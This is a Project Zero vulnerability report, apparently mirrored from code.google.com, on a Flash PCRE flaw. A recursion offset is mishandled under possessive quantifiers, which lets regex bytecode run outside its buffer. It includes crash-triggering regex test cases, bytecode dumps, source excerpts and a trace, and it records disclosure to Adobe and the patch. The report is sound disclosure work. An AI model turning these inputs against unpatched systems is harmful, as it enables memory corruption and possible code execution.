v4ng3l1s / google-security-research

Automatically exported from code.google.com/p/google-security-research
0 stars 0 forks source link

Flash PCRE regex compilation recursion offset arbitrary bytecode execution #216

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
There’s an error in the PCRE engine version used in Flash that allows the 
execution of arbitrary PCRE bytecode, with potential for memory corruption and 
RCE. 

The issue occurs in the handling of recursive calls to possessively-repeated 
groups.

Simplest testcase that will crash in an ASAN build of of avmshell is the 
following:

(A(?1))*+

This compiles to the following:

0000 5d001d     BRA              [29]
0003 5c0017     ONCE             [23]
0006 66         BRAZERO          
0007 5e00100001 CBRA             [16, 1]
000c 1c41       CHARNC           ['A']
000e 5c0006     ONCE             [6]
0011 510004     RECURSE          [4]
0014 540006     KET              [6]
0017 550010     KETRMAX          [16]
001a 540017     KET              [23]
001d 54001d     KET              [29]
0020 00         END

Looking at the following two regexes compiled, the issue is clear

(A)

0000 5d000d     BRA              [13]
0003 5e00070001 CBRA             [7, 1]
0008 1c41       CHARNC           ['A']
000a 540007     KET              [7]
000d 54000d     KET              [13]
0010 00         END     

(A(?1))

0000 5d0016     BRA              [22]
0003 5e00100001 CBRA             [16, 1]
0008 1c41       CHARNC           ['A']
000a 5c0006     ONCE             [6]
000d 510003     RECURSE          [3]
0010 540006     KET              [6]
0013 540010     KET              [16]
0016 540016     KET              [22]
0019 00         END  

We have inserted an OP_RECURSE opcode, and when we go back to add the 
OP_BRAZERO and OP_ONCE for the *+ quantifier, we fail to correctly adjust the 
offset of the OP_RECURSE. The cause of this can be seen in pcre_exec.cpp; the 
following code is used to insert the OP_BRAZERO instruction:

pcre_exec.cpp:4067

/* If the maximum is 1 or unlimited, we just have to stick in the
BRAZERO and do no more at this point. However, we do need to adjust
any OP_RECURSE calls inside the group that refer to the group itself or
any internal or forward referenced group, because the offset is from
the start of the whole regex. Temporarily terminate the pattern while
doing this. */

if (repeat_max <= 1)
  {
  *code = OP_END;
  adjust_recurse(previous, 1, utf8, cd, save_hwm);
  VMPI_memmove(previous+1, previous, len);
  code++;
  *previous++ = OP_BRAZERO + repeat_type;
  }

/* If the maximum is greater than 1 and limited, we have to replicate
in a nested fashion, sticking OP_BRAZERO before each set of brackets.
The first one has to be handled carefully because it's the original
copy, which has to be moved up. The remainder can be handled by code
that is common with the non-zero minimum case below. We have to
adjust the value or repeat_max, since one less copy is required. Once
again, we may have to adjust any OP_RECURSE calls inside the group. */

else
  {
  int offset;
  *code = OP_END;
  adjust_recurse(previous, 2 + LINK_SIZE, utf8, cd, save_hwm);
  VMPI_memmove(previous + 2 + LINK_SIZE, previous, len);
  code += 2 + LINK_SIZE;
  *previous++ = OP_BRAZERO + repeat_type;
  *previous++ = OP_BRA;

  /* We chain together the bracket offset fields that have to be
  filled in later when the ends of the brackets are reached. */

  offset = (bralink == NULL)? 0 : previous - bralink;
  bralink = previous; 
  PUTINC(previous, 0, offset);
  }

repeat_max--;
}

Which correctly adjusts our OP_RECURSE offsets; however when we insert the 
OP_ONCE:

pcre_exec.cpp:4300

/* If the character following a repeat is '+', or if certain optimization
tests above succeeded, possessive_quantifier is TRUE. For some of the
simpler opcodes, there is an special alternative opcode for this. For
anything else, we wrap the entire repeated item inside OP_ONCE brackets.
The '+' notation is just syntactic sugar, taken from Sun's Java package,
but the special opcodes can optimize it a bit. The repeated item starts at
tempcode, not at previous, which might be the first part of a string whose
(former) last char we repeated.

Possessifying an 'exact' quantifier has no effect, so we can ignore it. But
an 'upto' may follow. We skip over an 'exact' item, and then test the
length of what remains before proceeding. */

if (possessive_quantifier)
  {
  int len;
  if (*tempcode == OP_EXACT || *tempcode == OP_TYPEEXACT ||
      *tempcode == OP_NOTEXACT)
    tempcode += _pcre_OP_lengths[*tempcode];
  len = code - tempcode;
  if (len > 0) switch (*tempcode)
    {
    case OP_STAR:  *tempcode = OP_POSSTAR; break;
    case OP_PLUS:  *tempcode = OP_POSPLUS; break;
    case OP_QUERY: *tempcode = OP_POSQUERY; break;
    case OP_UPTO:  *tempcode = OP_POSUPTO; break;

    case OP_TYPESTAR:  *tempcode = OP_TYPEPOSSTAR; break;
    case OP_TYPEPLUS:  *tempcode = OP_TYPEPOSPLUS; break;
    case OP_TYPEQUERY: *tempcode = OP_TYPEPOSQUERY; break;
    case OP_TYPEUPTO:  *tempcode = OP_TYPEPOSUPTO; break;

    case OP_NOTSTAR:  *tempcode = OP_NOTPOSSTAR; break;
    case OP_NOTPLUS:  *tempcode = OP_NOTPOSPLUS; break;
    case OP_NOTQUERY: *tempcode = OP_NOTPOSQUERY; break;
    case OP_NOTUPTO:  *tempcode = OP_NOTPOSUPTO; break;

    default:
    VMPI_memmove(tempcode + 1+LINK_SIZE, tempcode, len);
    code += 1 + LINK_SIZE;
    len += 1 + LINK_SIZE;
    tempcode[0] = OP_ONCE;
    *code++ = OP_KET;
    PUTINC(code, 0, len);
    PUT(tempcode, 1, len);
    break;
    }
  }

We will then start our recursed execution at offset 5, which is conveniently 
controlled by us, as it is the length of the ‘OP_ONCE’ group.

A regex that achieves a more useful consequence is the following:

(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(?1))*+

Which compiles to

0000 5d0057     BRA              [87]
0003 5c0051     ONCE             [81]
0006 66         BRAZERO          
0007 5e004a0001 CBRA             [74, 1]
000c 1c41       CHARNC           ['A']
...
0046 1c41       CHARNC           ['A']
0048 5c0006     ONCE             [6]
004b 510004     RECURSE          [4]
004e 540006     KET              [6]
0051 55004a     KETRMAX          [74]
0054 540051     KET              [81]
0057 540057     KET              [87]
005a 00         END    

This makes the length of our initial match group 81, so that when the offcut 
recursion occurs we get the following:

0004 00         END              
0005 51665e     RECURSE          [26206]

This will cause the execution of regex bytecode to leave the legitimate 
bytecode buffer and jump forward by 0x665e bytes; see an execution trace below:

...
exec 0x1df60f8 92 [0x1df605e 41]
exec 0x1df60fb 81 [0x1df605e 41] <--- legitimate OP_RECURSE
recurse callpat = 31416500
Recursing into group 24064
exec 0x1df60b5 81 [0x1df605e 41] <--- offcut execution
recurse callpat = 31442702
Recursing into group 0
exec 0x1dfc70f 0 [0x1df605e 41] <--- execution has left legitimate bytecode
exec 0x1df60b8 0 [0x1df605e 41]
exec 0x1df6101 85 [0x1df605e 41]

As our bytecode buffer here was at 0x1df60b0 and had length 91, we can see that 
0x1dfc70f is well outside this buffer, and we have continued execution because 
the heap layout has been kind to us. Together with a heap groom, this can be 
used to achieve arbitrary regex bytecode execution.

This bug was found using AFL, written by lcamtuf.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by markbr...@google.com on 10 Dec 2014 at 8:57

GoogleCodeExporter commented 9 years ago

Original comment by markbr...@google.com on 10 Dec 2014 at 9:27

GoogleCodeExporter commented 9 years ago
Supplied a crash poc to adobe.

Original comment by markbr...@google.com on 18 Dec 2014 at 5:32

Attachments:

GoogleCodeExporter commented 9 years ago
Adobe requested a 2-day grace period because this patch is coming out on 
Thursday 12th March (two days after Patch Tuesday).

Original comment by cev...@google.com on 5 Mar 2015 at 7:39

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 6 Mar 2015 at 6:06

GoogleCodeExporter commented 9 years ago
https://helpx.adobe.com/security/products/flash-player/apsb15-05.html

Original comment by cev...@google.com on 12 Mar 2015 at 7:34

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 19 Mar 2015 at 7:57